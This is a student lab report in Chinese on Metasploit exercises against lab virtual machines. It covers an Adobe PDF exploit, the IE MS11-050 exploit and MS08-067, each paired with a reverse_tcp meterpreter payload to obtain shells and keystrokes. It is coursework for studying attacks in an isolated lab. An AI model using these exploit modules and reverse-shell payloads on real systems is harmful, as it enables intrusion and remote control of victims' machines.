20145306 《網絡攻防》 MSF基礎應用

20145306張文錦《網絡對抗》MSF應用

 

Adobe閱讀器滲透攻擊

• 兩臺虛擬機，其中一臺爲kali，一臺爲windows xp sp3，並保證兩臺虛擬機能夠ping通。

實驗過程

• 進入msfconsole。

• 輸入命令use exploit/windows/fileformat/adobe_cooltype_sing，進入該漏洞模塊;  使用命令set payload windows/meterpreter/reverse_tcp設置攻擊載荷;設置端口，主機ip，產生pdf文件名。

• show options顯示攻擊前所設置的數據。

• 輸入exploit,生成pdf文件，能夠看到pdf所在文件夾，將pdf複製到靶機裏。

• 主機開啓監聽模塊。
• 靶機運行pdf文件。
• 攻擊成功。

 

IE瀏覽器MS11050漏洞攻擊

• 兩臺虛擬機，主機（kali），靶機（windows xp sp3）

實驗步驟

• 在kali終端中開啓msfconsole。

• 輸入命令use windows/browser/ms11050mshtml_cobjectelement，進入該漏洞模塊，並設置參數。

• exploit 生成一個網址。

• 靶機打開http：//10.43.61.249：8080/zwj。
• 攻擊成功，抓擊鍵記錄，獲取shell。

MS08_067漏洞滲透攻擊實踐

實驗前準備

• 兩臺虛擬機，主機（kali），靶機（windows 2003 英文版）

實驗過程

• 主機kali的ip地址
  

• windows ip
• 使用ms 08——067模塊，並設置載荷，主機ip，靶機ip。
• 攻擊成功。
• 查看靶機ip。
• 獲取靶機shell。

MS08_067：meterpreter

• 設置攻擊模塊，載荷，ip地址。
• exploit。
• 查看ip。
• 查看進程。
• meterpreter 獲取 shell。

 

輔助模塊

• 主機 kali   靶機 windows xp sp 3 .

實驗過程

• show auxiliary查看攻擊模塊。
• 設置參數。
• exploit

 

實驗後回答問題

1.用本身的話解釋什麼是exploit,payload,encode？

        Exploit 的英文意思就是利用，就是利用漏洞攻擊。payload其實就是指載荷，運送到目標主機實現攻擊。encode:對須要的文件進行編碼。

實驗總結與體會

• 每一個實驗的步驟大體相同，首先用use使用攻擊模塊，而後有些須要set payload，以後show options ，照着將所須要的參數設置完整。

• 比較重要的是將主機和靶機ping通。